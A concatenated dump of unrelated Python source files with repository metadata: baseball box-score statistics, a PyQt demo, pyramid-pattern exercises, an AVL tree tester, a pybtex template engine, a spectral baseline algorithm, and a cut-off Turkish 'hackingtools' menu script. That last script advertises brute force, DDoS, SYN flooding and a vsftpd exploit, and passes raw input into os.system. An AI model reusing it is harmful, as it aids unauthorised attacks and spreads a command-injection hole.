inning_half_list: for plate_appearance in inning_half: summary = plate_appearance.plate_appearance_summary if (pitcher == plate_appearance.pitcher and summary == 'Intent Walk'): num_intent_walks += 1 return num_intent_walks def get_pitcher_hit_by_pitch(pitcher, inning_half_list): num_hbp = 0 for inning_half in inning_half_list: for plate_appearance in inning_half: summary = plate_appearance.plate_appearance_summary if (pitcher == plate_appearance.pitcher and summary == 'Hit By Pitch'): num_hbp += 1 return num_hbp def get_pitcher_balks(pitcher, inning_half_list): num_balks = 0 for inning_half in inning_half_list: for plate_appearance in inning_half: if pitcher == plate_appearance.pitcher: last_description = None for event in plate_appearance.event_list: if isinstance(event, RunnerAdvance): if (event.run_description == 'Balk' and last_description != event.run_description): num_balks += 1 last_description = event.run_description else: last_description = None return num_balks def get_pitcher_wild_pitches(pitcher, inning_half_list): num_wp = 0 for inning_half in inning_half_list: for plate_appearance in inning_half: if pitcher == plate_appearance.pitcher: last_description = None for event in plate_appearance.event_list: if isinstance(event, RunnerAdvance): if (event.run_description == 'Wild Pitch' and last_description != event.run_description): num_wp += 1 last_description = event.run_description else: last_description = None return num_wp def get_pitcher_home_runs(pitcher, inning_half_list): num_hr = 0 for inning_half in inning_half_list: for plate_appearance in inning_half: if (pitcher == plate_appearance.pitcher and plate_appearance.scorecard_summary == 'HR'): num_hr += 1 return num_hr def get_pitcher_strikes(pitcher, inning_half_list): num_strikes = 0 for inning_half in inning_half_list: for plate_appearance in inning_half: if pitcher == plate_appearance.pitcher: for event in plate_appearance.event_list: if (isinstance(event, Pitch) and event.pitch_description != 'Ball' and event.pitch_description != 'Ball In Dirt' and event.pitch_description != 'Hit By Pitch'): num_strikes += 1 return num_strikes def get_pitcher_pitches(pitcher, inning_half_list): num_pitches = 0 for inning_half in inning_half_list: for plate_appearance in inning_half: if pitcher == plate_appearance.pitcher: for event in plate_appearance.event_list: if isinstance(event, Pitch): num_pitches += 1 return num_pitches def get_innings_pitched_calc_num(pitcher, inning_half_list): innings_pitched = get_pitcher_innings_pitched(pitcher, inning_half_list) if str(innings_pitched)[-2:] == '.1': innings_pitched_num = float(str(innings_pitched)[:-2]) + (1.0/3.0) elif str(innings_pitched)[-2:] == '.2': innings_pitched_num = float(str(innings_pitched)[:-2]) + (2.0/3.0) else: innings_pitched_num = innings_pitched return innings_pitched_num def get_pitcher_era(pitcher, inning_half_list): if get_pitcher_innings_pitched(pitcher, inning_half_list) == 0: era = '&#8734;' else: innings_pitched_num = get_innings_pitched_calc_num(pitcher, inning_half_list) era = round( 9.0 * ( float(get_pitcher_earned_runs(pitcher, inning_half_list)) / innings_pitched_num ), 3 ) return era def get_pitcher_whip(pitcher, inning_half_list): num_hits = get_pitcher_hits(pitcher, inning_half_list) num_walks = get_pitcher_nonintentional_walks(pitcher, inning_half_list) innings_pitched_num = get_innings_pitched_calc_num( pitcher, inning_half_list ) if innings_pitched_num == 0: whip = '&#8734;' else: whip = round( float(num_hits + num_walks) / float(innings_pitched_num), 3 ) return whip def get_strikes(appearance_list): num_strikes = 0 for plate_appearance in appearance_list: for event in plate_appearance.event_list: if (isinstance(event, Pitch) and event.pitch_description != 'Ball' and event.pitch_description != 'Ball In Dirt' and event.pitch_description != 'Hit By Pitch'): num_strikes += 1 return num_strikes def get_pitches(appearance_list): num_pitches = 0 for plate_appearance in appearance_list: for event in plate_appearance.event_list: if isinstance(event, Pitch): num_pitches += 1 return num_pitches def get_walks(appearance_list): num_walks = 0 for plate_appearance in appearance_list: if 'BB' in plate_appearance.scorecard_summary: num_walks += 1 return num_walks def get_strikeouts(appearance_list): num_strikeouts = 0 for plate_appearance in appearance_list: if ('K' in plate_appearance.scorecard_summary or 'ꓘ' in plate_appearance.scorecard_summary): num_strikeouts += 1 return num_strikeouts def get_lob(appearance_list): first_base = None second_base = None third_base = None for plate_appearance in appearance_list: (first_base, second_base, third_base) = process_baserunners(plate_appearance, appearance_list[-1], first_base, second_base, third_base) num_lob = 0 if first_base: num_lob += 1 if second_base: num_lob += 1 if third_base: num_lob += 1 return num_lob def get_errors(appearance_list): num_errors = 0 for plate_appearance in appearance_list: if plate_appearance.error_str: num_errors += 1 last_description = None for event in plate_appearance.event_list: if isinstance(event, RunnerAdvance): if ('Pickoff Error' in event.run_description and last_description != event.run_description): num_errors += 1 last_description = event.run_description else: last_description = None return num_errors def get_hits(appearance_list): num_hits = 0 for plate_appearance in appearance_list: for code in HIT_CODE_LIST: if code in plate_appearance.scorecard_summary: num_hits += 1 continue return num_hits def get_runs(appearance_list): num_runs = 0 for plate_appearance in appearance_list: num_runs += len(plate_appearance.scoring_runners_list) return num_runs def count_summaries_by_keyword(inning_half_list, keyword): num_keyword_appearances = 0 for appearance_list in inning_half_list: for appearance in appearance_list: if keyword in appearance.plate_appearance_summary: num_keyword_appearances += 1 return num_keyword_appearances def count_runner_advance_unique_keywords(inning_half_list, keyword): after_pitch = False num_keyword_appearances = 0 for appearance_list in inning_half_list: for appearance in appearance_list: for event in appearance.event_list: if isinstance(event, Pitch): after_pitch = True elif isinstance(event, RunnerAdvance): if after_pitch and keyword in event.run_description: num_keyword_appearances += 1 after_pitch = False return num_keyword_appearances def count_runner_advance_total_keywords(inning_half_list, keyword): num_keyword_appearances = 0 for appearance_list in inning_half_list: for appearance in appearance_list: for event in appearance.event_list: if isinstance(event, RunnerAdvance): if keyword in event.run_description: num_keyword_appearances += 1 return num_keyword_appearances def get_team_singles(inning_half_list): return count_summaries_by_keyword(inning_half_list, 'Single') def get_team_doubles(inning_half_list): return count_summaries_by_keyword(inning_half_list, 'Double') def get_team_triples(inning_half_list): return count_summaries_by_keyword(inning_half_list, 'Triple') def get_team_home_runs(inning_half_list): return count_summaries_by_keyword(inning_half_list, 'Home Run') def get_team_sac_flies(inning_half_list): return count_summaries_by_keyword(inning_half_list, 'Sac Fly') def get_team_sac_bunts(inning_half_list): return count_summaries_by_keyword(inning_half_list, 'Sac Bunt') def get_team_batted_into_double_plays(inning_half_list): return ( count_summaries_by_keyword(inning_half_list, 'Double Play') + count_summaries_by_keyword(inning_half_list, 'DP') ) def get_team_hit_by_pitches(inning_half_list): return count_summaries_by_keyword(inning_half_list, 'Hit By Pitch') def get_team_received_wild_pitches(inning_half_list): return count_runner_advance_unique_keywords(inning_half_list, 'Wild Pitch') def get_team_received_passed_balls(inning_half_list): return count_runner_advance_unique_keywords(inning_half_list, 'Passed Ball') def get_team_stolen_bases(inning_half_list): return count_runner_advance_total_keywords(inning_half_list, 'Stolen Base') def get_team_caught_stealing(inning_half_list): return count_runner_advance_total_keywords(inning_half_list, 'Caught Stealing') def get_team_plate_appearances(inning_half_list): return len( [appearance for appearance_list in inning_half_list for appearance in appearance_list if appearance.plate_appearance_summary != 'Runner Out'] ) def get_team_stats(game, inning_half_str): inning_half_list = get_inning_half_list(game, inning_half_str) team_box_score = TeamBoxScore( get_team_singles(inning_half_list), get_team_doubles(inning_half_list), get_team_triples(inning_half_list), get_team_home_runs(inning_half_list), get_team_sac_flies(inning_half_list), get_team_sac_bunts(inning_half_list), get_team_batted_into_double_plays(inning_half_list), get_team_hit_by_pitches(inning_half_list), get_team_received_wild_pitches(inning_half_list), get_team_received_passed_balls(inning_half_list), get_team_stolen_bases(inning_half_list), get_team_caught_stealing(inning_half_list), get_team_plate_appearances(inning_half_list) ) return team_box_score
[ "benjamincrom@Benjamin-Croms-MacBook-Pro.local" ]
benjamincrom@Benjamin-Croms-MacBook-Pro.local
1fb33c4a4b1fe9e1f60f69dc812c4ce19ef1d974
f7a8c14d51b2df7861da540813381e7f84a07ea4
/20170728/writefile.py
b21466573584b8a9b96446fef3313462e61ffb66
[]
no_license
wangyincheng/pythonstudy
987be259988c68a0f71ffdae5fedae8b3a92e749
f711dd181648d1eee64a2251fa1745e38cb8a97c
refs/heads/master
2021-01-01T19:41:28.704371
2018-02-23T03:03:48
2018-02-23T03:03:48
98,651,844
1
0
null
null
null
null
UTF-8
Python
false
false
420
py
#!/usr/env python # name='', # version='', # packages=, # author='', # create time= # change author= # change time= # author_email='', # msg= #with open('D:/pycharmworkspace/pythonstudy/20170728/HELLOWORD.TXT',mode='w',encoding='utf-8') as file: # file.writelines('hello word!') with open('D:/test/HELLOWORD.TXT',mode='w',encoding='utf-8') as file: file.writelines('hello word!')
[ "979411006@qq.com" ]
979411006@qq.com
01a770beaa99d7f4d58decb95afc5e00073bece7
4cc6a24bc28f97ba08a42310317c6cdd83f67cab
/pi/node_ui/node_ui.py
de2554cfe4bbcb63202f54ece0d332235bb09fb9
[]
no_license
bsinglet/EmbeddedSystemsDesign_F2016
186aaa2c271184903138be0b2d0acff8ad1daf49
6935cf335aa7579d3e636c6d56a91e8960554eed
refs/heads/master
2022-04-05T09:29:15.014212
2016-12-14T01:15:23
2016-12-14T01:15:23
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,464
py
#!/usr/bin/python2 import sys from PyQt4 import QtGui, QtCore from itertools import product nodes = list(product(xrange(5), xrange(5))) print(nodes) class Example(QtGui.QWidget): def __init__(self): super(Example, self).__init__() self.initUI() def initUI(self): self.setGeometry(100, 300, 280, 270) self.setWindowTitle('Pen styles') self.show() def paintEvent(self, e): qp = QtGui.QPainter() qp.begin(self) self.drawLines(qp) qp.end() def drawLines(self, qp): pen = QtGui.QPen(QtCore.Qt.black, 2, QtCore.Qt.SolidLine) qp.setPen(pen) qp.drawLine(20, 40, 250, 40) pen.setStyle(QtCore.Qt.DashLine) qp.setPen(pen) qp.drawLine(20, 80, 250, 80) pen.setStyle(QtCore.Qt.DashDotLine) qp.setPen(pen) qp.drawLine(20, 120, 250, 120) pen.setStyle(QtCore.Qt.DotLine) qp.setPen(pen) qp.drawLine(20, 160, 250, 160) pen.setStyle(QtCore.Qt.DashDotDotLine) qp.setPen(pen) qp.drawLine(20, 200, 250, 200) pen.setStyle(QtCore.Qt.CustomDashLine) pen.setDashPattern([1, 4, 5, 4]) qp.setPen(pen) qp.drawLine(20, 240, 250, 240) def main(): app = QtGui.QApplication(sys.argv) ex = Example() sys.exit(app.exec_()) if __name__ == '__main__': main()
[ "duttondj@vt.edu" ]
duttondj@vt.edu
701e8b034a2cb1962009d375e11c3d0997ccb87e
4ca346cabfa2377f63a36bc0579a5bcd65e9fb57
/Week-1-Task-4.py
fa687b6f6510c87998a953d9d40b8ca90fdb298e
[]
no_license
fahixa/PROCLUB
199fa590beadd8b9bff6c405b1c64e590d6f3b7c
03a00cfe6943150efcf2e407bcc020c687bde5c0
refs/heads/main
2023-01-24T22:09:46.636209
2020-11-19T08:24:56
2020-11-19T08:24:56
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,920
py
def half_pyramid_pattern(rows): for i in range(0, rows): for j in range(0, i+1): print("* ",end="") print("\r") def half_pyramid_pattern_inverted(rows): for i in range(rows, 0, -1): for j in range(1, i + 1): print("*", end=' ') print('\r') def half_pyramid_pattern_mirrored(rows): k = 2*rows - 2 for i in range(0, rows): for j in range(0, k): print(end=" ") k = k - 2 for j in range(0, i+1): print("* ", end="") print("\r") def full_pyramid_pattern(rows): k = 2*rows - 2 for i in range(0, rows): for j in range(0, k): print(end=" ") k = k - 1 for j in range(0, i+1): print("* ", end="") print("\r") def full_pyramid_pattern_inverted(rows): k = 2 * rows - 2 for i in range(rows, -1, -1): for j in range(k, 0, -1): print(end=" ") k = k + 1 for j in range(0, i + 1): print("*", end=" ") print("") def print_pattern(pattern,row): if pattern == 1: half_pyramid_pattern(row) elif pattern == 2: half_pyramid_pattern_inverted(row) elif pattern == 3: half_pyramid_pattern_mirrored(row) elif pattern == 4: full_pyramid_pattern(row) elif pattern == 5: full_pyramid_pattern_inverted(row) else: print("Pilihan pattern tidak ada.") def tampil_menu_segitiga(): print('1.Half Pyramid Pattern') print('2.Half Pyramid Pattern Inverted') print('3.Half Pyramid Pattern Mirrored') print('4.Full Pyramid Pattern') print('5.Full Pyramid Inverted Pattern') tampil_menu_segitiga() pattern = int(input('Pilih jenis pattern \t: ')) row = int(input('Pilih banyak baris \t: ')) print('===============================') print_pattern(pattern,row)
[ "noreply@github.com" ]
fahixa.noreply@github.com
f39c5b174846ac3a115206eea553e303ba6bae2d
cb39d25e115557c26d89a7c8a08dc08464b101d3
/main/calculations.py
4bac744f6d6c5125ec88d14e7761b46ab728dbcb
[]
no_license
kelvinxuande/keithley-opensource
8f7c787952d5d4132dab543b1c59167a94d305cf
661f9002cc03fd395e69628b0470aee99af135ca
refs/heads/master
2022-11-21T02:39:32.668396
2020-07-26T09:16:17
2020-07-26T09:16:17
195,480,543
0
0
null
null
null
null
UTF-8
Python
false
false
2,518
py
""" Generate estimated time based on start time, poll period and number of polls Designed for use-cases shorter than 24 hours """ from datetime import datetime def updateEst(numberOftimes, period): totalSeconds = (numberOftimes*period) clockedHours = int(totalSeconds/3600) secondsLeft = totalSeconds - (clockedHours*3600) clockedMins = int(secondsLeft/60) # clockedSeconds = secondsLeft - (clockedMins*60) time_h = datetime.now().strftime('%H') time_m = datetime.now().strftime('%M') time_hours = int(time_h) time_minutes = int(time_m) time_hours = time_hours + clockedHours time_minutes = time_minutes + clockedMins zero = "0" if (time_minutes>60): time_minutes = time_minutes - 60 time_hours = time_hours + 1 if (time_hours>24): time_hours = time_hours - 24 if (time_minutes<10): time_minutes = str(time_minutes) time_minutes = zero + time_minutes if (time_hours<10): time_hours = str(time_hours) time_hours = zero + time_hours if (clockedHours==0 and clockedMins==0): runTime = ("Less than one minute") else: runTime = ("%d Hrs %d Mins" %(clockedHours, clockedMins)) startTime = datetime.now().strftime('%H:%M') endTime = ("%s:%s" %(time_hours, time_minutes)) return runTime, startTime, endTime hours_runStartTime = 99 runStartTime = 0 def set_runStartTime(): global hours_runStartTime global runStartTime mins = int(datetime.now().strftime('%M')) secs = int(datetime.now().strftime('%S')) hours_runStartTime = int(datetime.now().strftime('%H')) runStartTime = (hours_runStartTime*3600)+(mins*60)+secs def timeDifference(option): global hours_runStartTime global runStartTime # 0 to just get currentTime, 1 to get time difference in seconds between poll start time and current time if (option == 1): # time = datetime.now().strftime('%H:%M:%S.%f') hours = int(datetime.now().strftime('%H')) mins = int(datetime.now().strftime('%M')) secs = int(datetime.now().strftime('%S')) if hours_runStartTime > hours: hours = hours + 24 currentTime_inSecs = (hours*3600)+(mins*60)+secs timeDifference = currentTime_inSecs - runStartTime return timeDifference else: # if option == 0: currentTime = datetime.now().strftime('%H:%M:%S') return currentTime
[ "noreply@github.com" ]
kelvinxuande.noreply@github.com
931896263bebf84e1b742fc4256243bdbe10d638
395f974e62eafed74572efebcd91d62966e61639
/deprecated/obsolete/src/testavl.py
10d7a4e08ece3e0ff7e6d4fe13926d33defb668e
[ "Apache-2.0" ]
permissive
agroce/tstl
ad386d027f0f5ff750eab19a722a4b119ed39211
8d43ef7fa49534868e6cdf1697863748260405c7
refs/heads/master
2023-08-08T19:14:52.020314
2023-07-26T17:51:36
2023-07-26T17:51:36
32,408,285
106
33
NOASSERTION
2021-01-26T19:05:17
2015-03-17T17:14:04
Python
UTF-8
Python
false
false
1,506
py
import avl import random import sys import coverage import time import numpy start = time.time() branchesHit = set() maxval = int(sys.argv[1]) testlen = int(sys.argv[2]) numtests = int(sys.argv[3]) cov = coverage.coverage(branch=True, source=["avl.py"]) cov.start() for t in xrange(0,numtests): a = avl.AVLTree() test = [] ref = set() for s in xrange(0,testlen): h = a.height n = len(ref) if (n > 0): if not (h <= (numpy.log2(n)+1)): print h print n print (numpy.log2(n)) sys.exit(0) op = random.choice(["add","del","find"]) val = random.randrange(0,maxval) test.append((op,val)) if op == "add": a.insert(val) ref.add(val) elif op == "del": a.delete(val) ref.discard(val) elif op == "find": assert (a.find(val) == (val in ref)) currBranches = cov.collector.get_arc_data() for src_file, arcs in currBranches.iteritems(): for arc in arcs: branch = (src_file, arc) if branch not in branchesHit: branchesHit.add(branch) elapsed = time.time()-start print elapsed,len(branchesHit),branch avlitems = a.inorder_traverse() setitems = [] for item in ref: setitems.append(item) setitems = sorted(setitems) assert (avlitems == setitems)
[ "agroce@gmail.com" ]
agroce@gmail.com
84a3003f58be5449b9138304a8c0114eeaf794a0
75831bfff82ea921365ab8baef55178d63621e2b
/kjn_biedronka_demo/kjn_pricetag/forms.py
5244103eaae30268d34d8c274c976ff625b2d769
[ "MIT" ]
permissive
kornellewy/kjn_biedronka_demo
1a6c0f0ec0447dc3309997b43bda1e3cb4db7f6f
a1b0d3baaaee5bca4977b76fa0b3934a533a2f59
refs/heads/main
2023-01-04T00:45:48.911657
2020-10-15T16:31:10
2020-10-15T16:31:10
304,374,754
1
0
null
null
null
null
UTF-8
Python
false
false
253
py
from django import forms import os from django.conf import settings class UploadFieldForm(forms.Form): movie_name = forms.CharField(max_length=1000) movie_field = forms.FileField(widget=forms.ClearableFileInput(attrs={'multiple': False}))
[ "noreply@github.com" ]
kornellewy.noreply@github.com
da8082ea2ec2d2f8041e4b9c4dd6fc2abd1ff954
767f83ada603bf0330fff9a9df888573ebe87eae
/src-bib/pybtex/pybtex/style/template.py
a682f243fc85498e6f2e81d9a3587407bfb0d1b1
[ "MIT" ]
permissive
AndreaCensi/andreaweb
756e03114d2bb63012523e9f6a179bee3b9d745c
ac110acf59797f096f2ab50e848969f964771295
refs/heads/master
2021-01-13T08:44:30.774965
2020-12-29T17:14:25
2020-12-29T17:14:25
81,645,465
0
0
null
null
null
null
UTF-8
Python
false
false
9,742
py
# vim:fileencoding=utf8 # Copyright (c) 2008, 2009, 2010, 2011, 2012 Andrey Golovizin # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY # CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, # TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE # SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ A template engine for bibliography entries and more. Inspired by Brevé -- http://breve.twisty-industries.com/ >>> from pybtex.database import Entry, Person >>> author = Person(first='First', last='Last', middle='Middle') >>> fields = { ... 'title': 'The Book', ... 'year': '2000', ... } >>> e = Entry('book', fields=fields) >>> book_format = sentence(sep=', ') [ ... field('title'), field('year'), optional [field('sdf')] ... ] >>> print book_format.format_data(e).plaintext() The Book, 2000. >>> print words ['one', 'two', words ['three', 'four']].format_data(e).plaintext() one two three four """ from pybtex import richtext from pybtex.exceptions import PybtexError __test__ = {} # for doctest class Proto(object): def __init__(self, *args, **kwargs): self.args = args self.kwargs = kwargs def __call__(self, *args, **kwargs): return Node(*self.args, **self.kwargs)(*args, **kwargs) def __getitem__(self, children): return Node(*self.args, **self.kwargs)[children] def __repr__(self): return repr(Node(*self.args, **self.kwargs)) def format_data(self, *args, **kwargs): return Node(*self.args, **self.kwargs).format_data(*args, **kwargs) def format(self): return self.format_data(None) class Node(object): def __init__(self, name, f): self.name = name self.f = f self.args = [] self.kwargs = {} self.children = [] def __call__(self, *args, **kwargs): self.args = args self.kwargs.update(kwargs) return self def __getitem__(self, children): if isinstance(children, (list, tuple)): self.children = children else: self.children.append(children) return self def __repr__(self): """ >>> join(', ') join(', ') >>> join join >>> join ['a'] join ['a'] >>> join ['a', 'b', 'c'] join ['a', 'b', 'c'] >>> join(' ') ['a', 'b', 'c'] join(' ') ['a', 'b', 'c'] >>> join(sep=' ') ['a', 'b', 'c'] join(sep=' ') ['a', 'b', 'c'] >>> join(sep=' ') [tag('em') ['a', 'b', 'c']] join(sep=' ') [tag('em') ['a', 'b', 'c']] """ params = [] args_repr = ', '.join(repr(arg) for arg in self.args) if args_repr: params.append(args_repr) kwargs_repr = ', '.join('%s=%s' % (key, repr(value)) for (key, value) in self.kwargs.iteritems()) if kwargs_repr: params.append(kwargs_repr) if params: params_repr = '(%s)' % ', '.join(params) else: params_repr = '' if self.children: children_repr = ' [%s]' % ', '.join(repr(child) for child in self.children) else: children_repr = '' return ''.join([self.name, params_repr, children_repr]) def format_data(self, data): """Format the given data into a piece of richtext.Text""" return self.f(self.children, data, *self.args, **self.kwargs) def format(self): """A convenience function to be used instead of format_data when no data is needed. """ return self.format_data(None) def _format_data(node, data): try: f = node.format_data except AttributeError: return unicode(node) else: return f(data) def _format_list(list_, data): return (_format_data(part, data) for part in list_) def node(f): if f.__doc__: __test__[f.__name__] = f return Proto(f.__name__, f) @node def join(children, data, sep='', sep2=None, last_sep=None): """Join text fragments together. >>> print join.format().plaintext() <BLANKLINE> >>> print join ['a', 'b', 'c', 'd', 'e'].format().plaintext() abcde >>> print join(sep=', ', sep2=' and ', last_sep=', and ') ['Tom', 'Jerry'].format().plaintext() Tom and Jerry >>> print join(sep=', ', sep2=' and ', last_sep=', and ') ['Billy', 'Willy', 'Dilly'].format().plaintext() Billy, Willy, and Dilly """ if sep2 is None: sep2 = sep if last_sep is None: last_sep = sep parts = [part for part in _format_list(children, data) if part] if len(parts) <= 1: return richtext.Text(*parts) elif len(parts) == 2: return richtext.Text(sep2).join(parts) else: return richtext.Text(last_sep).join([richtext.Text(sep).join(parts[:-1]), parts[-1]]) @node def words(children, data, sep=' '): """Join text fragments with spaces or something else.""" return join(sep) [children].format_data(data) @node def together(children, data, last_tie=True): """ Try to keep words together, like BibTeX does. >>> print together ['very', 'long', 'road'].format().plaintext() very long<nbsp>road >>> print together ['a', 'very', 'long', 'road'].format().plaintext() a<nbsp>very long<nbsp>road """ from pybtex.bibtex.names import tie_or_space tie = richtext.Text(richtext.nbsp) space = richtext.Text(' ') parts = [part for part in _format_list(children, data) if part] if not parts: return richtext.Text() if len(parts) <= 2: tie2 = tie if last_tie else tie_or_space(parts[0], tie, space) return tie2.join(parts) else: last_tie = tie if last_tie else tie_or_space(parts[-1], tie, space) return richtext.Text(parts[0], tie_or_space(parts[0], tie, space), space.join(parts[1:-1]), last_tie, parts[-1]) @node def sentence(children, data, capfirst=True, add_period=True, sep=', '): """Join text fragments, capitalyze the first letter, add a period to the end. >>> print sentence.format().plaintext() <BLANKLINE> >>> print sentence(sep=' ') ['mary', 'had', 'a', 'little', 'lamb'].format().plaintext() Mary had a little lamb. >>> print sentence(capfirst=False, add_period=False) ['uno', 'dos', 'tres'].format().plaintext() uno, dos, tres """ text = join(sep) [children].format_data(data) if capfirst: text = text.capfirst() if add_period: text = text.add_period() return text class FieldIsMissing(PybtexError): def __init__(self, field_name, entry): self.field_name = field_name super(FieldIsMissing, self).__init__( 'missing field: %s in %s' % (field_name, entry)) @node def field(children, data, name, apply_func=None): """Return the contents of the bibliography entry field.""" assert not children try: field = data.fields[name] except KeyError: raise FieldIsMissing(name, data) else: if apply_func: field = apply_func(field) return field @node def names(children, data, role, **kwargs): """Return formatted names.""" assert not children try: persons = data.persons[role] except KeyError: # role is a bibtex field so it makes sense # to raise FieldIsMissing; optional will catch it raise FieldIsMissing(role, data) from pybtex.style.names.plain import NameStyle name_style = NameStyle() return join(**kwargs) [[name_style.format(person) for person in persons]].format_data(data) @node def optional(children, data): """If children contain a missing bibliography field, return None. Else return formatted children. >>> from pybtex.database import Entry >>> template = optional [field('volume'), optional['(', field('number'), ')']] >>> print template.format_data(Entry('article')) [] """ try: return richtext.Text(*_format_list(children, data)) except FieldIsMissing: return richtext.Text() @node def optional_field(children, data, *args, **kwargs): assert not children return optional [field(*args, **kwargs)].format_data(data) @node def tag(children, data, name): """Wrap text into a tag. >>> import pybtex.backends.html >>> html = pybtex.backends.html.Backend() >>> print tag('emph') ['important'].format().render(html) <em>important</em> >>> print sentence ['ready', 'set', tag('emph') ['go']].format().render(html) Ready, set, <em>go</em>. """ parts = _format_list(children, data) return richtext.Tag(name, *_format_list(children, data)) @node def first_of(children, data): """Return first nonempty child.""" for child in _format_list(children, data): if child: return child return richtext.Text()
[ "andrea@cds.caltech.edu" ]
andrea@cds.caltech.edu
39b8064697b235b8ee56a59fd9fa9f492e89e499
9883c74087fbd0b63f2320d55860908ff28b572d
/part1_week5/sample3.py
8526d7a80eae8688d92bcb838134228912d3a193
[]
no_license
venkateswararao-kotha/it-cert-automation-all-modules
54fab51355d2154e165d3307d49d214915fd428a
3a4b5bce1325384c45669f9d20fc9c9c9944d58f
refs/heads/master
2022-12-01T15:24:45.596704
2020-08-12T21:53:06
2020-08-12T21:53:06
287,121,325
0
0
null
null
null
null
UTF-8
Python
false
false
254
py
#!/usr/bin/python3 def KelvinToFahrenheit(Temperature): assert (Temperature >= 0),"Colder than absolute zero!" return ((Temperature-273)*1.8)+32 print(KelvinToFahrenheit(273)) print(int(KelvinToFahrenheit(505.78))) print(KelvinToFahrenheit(-5))
[ "venkatababu@gmail.com" ]
venkatababu@gmail.com
ab6413657b6aec2d0baa7f294c401ed057ccceb3
fb3818cfa326aad3ad958eec6376d3b9a242f96d
/app/algorithms/debackground.py
c7bf37f36087526df2b03eea76c4cf712227ec2f
[]
no_license
StaveWu/RamanSpectrometer-Flasky
2aaa647657b70594fddccfa853cac02695317341
85056e5f07227a4405f0bef077976387bf29ff4b
refs/heads/master
2022-11-24T07:57:42.953905
2019-06-14T15:25:03
2019-06-14T15:25:03
185,988,925
1
0
null
2022-11-21T21:30:45
2019-05-10T12:59:20
Python
UTF-8
Python
false
false
2,167
py
import numpy as np from scipy.sparse import csc_matrix, eye, diags from scipy.sparse.linalg import spsolve def WhittakerSmooth(x, w, lambda_, differences=1): """ Penalized least squares algorithms for background fitting input x: input data (i.e. chromatogram of spectrum) w: binary masks (value of the mask is zero if a point belongs to peaks and one otherwise) lambda_: parameter that can be adjusted by user. The larger lambda is, the smoother the resulting background differences: integer indicating the order of the difference of penalties output the fitted background vector """ X = np.matrix(x) m = X.size i = np.arange(0, m) E = eye(m, format='csc') D = E[1:] - E[:-1] # numpy.diff() does not work with sparse matrix. This is a workaround. W = diags(w, 0, shape=(m, m)) A = csc_matrix(W + (lambda_ * D.T * D)) B = csc_matrix(W * X.T) background = spsolve(A, B) return np.array(background) def airPLS_baseline(x, lambda_=100, porder=1, itermax=15): """ Adaptive iteratively reweighted penalized least squares for baseline fitting input x: input data (i.e. chromatogram of spectrum) lambda_: parameter that can be adjusted by user. The larger lambda is, the smoother the resulting background, z porder: adaptive iteratively reweighted penalized least squares for baseline fitting output the fitted background vector """ m = x.shape[0] w = np.ones(m) for i in range(1, itermax + 1): z = WhittakerSmooth(x, w, lambda_, porder) d = x - z dssn = np.abs(d[d < 0].sum()) if dssn < 0.001 * (abs(x)).sum() or i == itermax: if i == itermax: print('WARING max iteration reached!') break w[d >= 0] = 0 # d>0 means that this point is part of a peak, so its weight is set to 0 in order to ignore it w[d < 0] = np.exp(i * np.abs(d[d < 0]) / dssn) w[0] = np.exp(i * (d[d < 0]).max() / dssn) w[-1] = w[0] return z def airPLS(x, lambda_): baseline = airPLS_baseline(x, lambda_) return x - baseline
[ "wtengda0816@outlook.com" ]
wtengda0816@outlook.com
3a3b6649c42c0c69bdab53756dd8b7c4e679608d
6180c367888de6a9cba252f1930f0e801f2528e0
/hackingtools.py
ca058193518e310048c023764c771825d07db326
[ "Apache-2.0" ]
permissive
hawk-unity/hawksploit
43837ff80f4fdda42264fc28253e5b63265681d8
3518f8fe0d10862cce1c267f01445a81fe55ccf1
refs/heads/main
2023-08-18T09:04:15.211491
2021-09-26T16:12:41
2021-09-26T16:12:41
407,313,402
0
0
null
null
null
null
UTF-8
Python
false
false
6,311
py
import hashlib import os import json import subprocess import urllib3 import socket import requests import colorama import random import string from colorama import Fore, Back, Style, init print(""" _________ ___ _______ __ _______ ____ __ ____ __________ __ / ___/ __ \/ _ \/ __/ _ \ / // / / / | /| / / //_/ / __ \/ __/ ___/ |/_/ / /__/ /_/ / // / _// // / / _ /_ _/ |/ |/ / ,< / /_/ / _// /___> < \___/\____/____/___/____/ /_//_/ /_/ |__/|__/_/|_| \____/_/ \___/_/|_| YouTube : HAWK DEFENDER Coder : H4WK OFCX İnstagram : hawkofcx git hub : hawk-unity """) print(""" => Kullanım : | - help (yardım) | - nmap (port scan nmap kullanır) | - dmitry (dmitry kullanarak scan) | - xss (python ile payload) | - Sql (sqlmap kullanır) | - nikto (-h parametresi) | - urlcrazy (kullan) | - ssh ( brute force yap ) | - ftp (ftp brute force) | - md5crack (md5 cracker) | - iptrace (ip tracer , ip info) | - md5gen (md5 generator) | - whois (whois adres) | - subdomain (subdomain bak) | - vsftpd (exploit) | - synack (py syn-ack flood) | - ddos (python ddos flood) | - clear (terminal temizle) | """) while True : veri = input("Seçenek seç => ") if veri == "help": print(""" - help (yardım) | - nmap (port scan nmap kullanır) | - dmitry (dmitry kullanarak scan) | - xss (python ile payload) | - Sql (sqlmap kullanır) | - nikto (-h parametresi) | - urlcrazy (kullan) | - ssh ( brute force yap ) | - ftp (ftp brute force) | - md5crack (md5 cracker) | - iptrace (ip tracer , ip info) | - md5gen (md5 generator) | - whois (whois adres) | - subdomain (subdomain bak) | - vsftpd (exploit) | - synack (py syn-ack flood) | - ddos (python ddos flood) | - clear (terminal temizle) | """) if veri == "nmap": portscan = input("Hedef adresi ver =>") os.system("nmap "+portscan) if veri == "dmitry": site = input("Hedef =>") os.system("dmitry -w ", site) os.system("dmitry -o ", site) os.system("dmitry -i ", site) os.system("dmitry -n ", 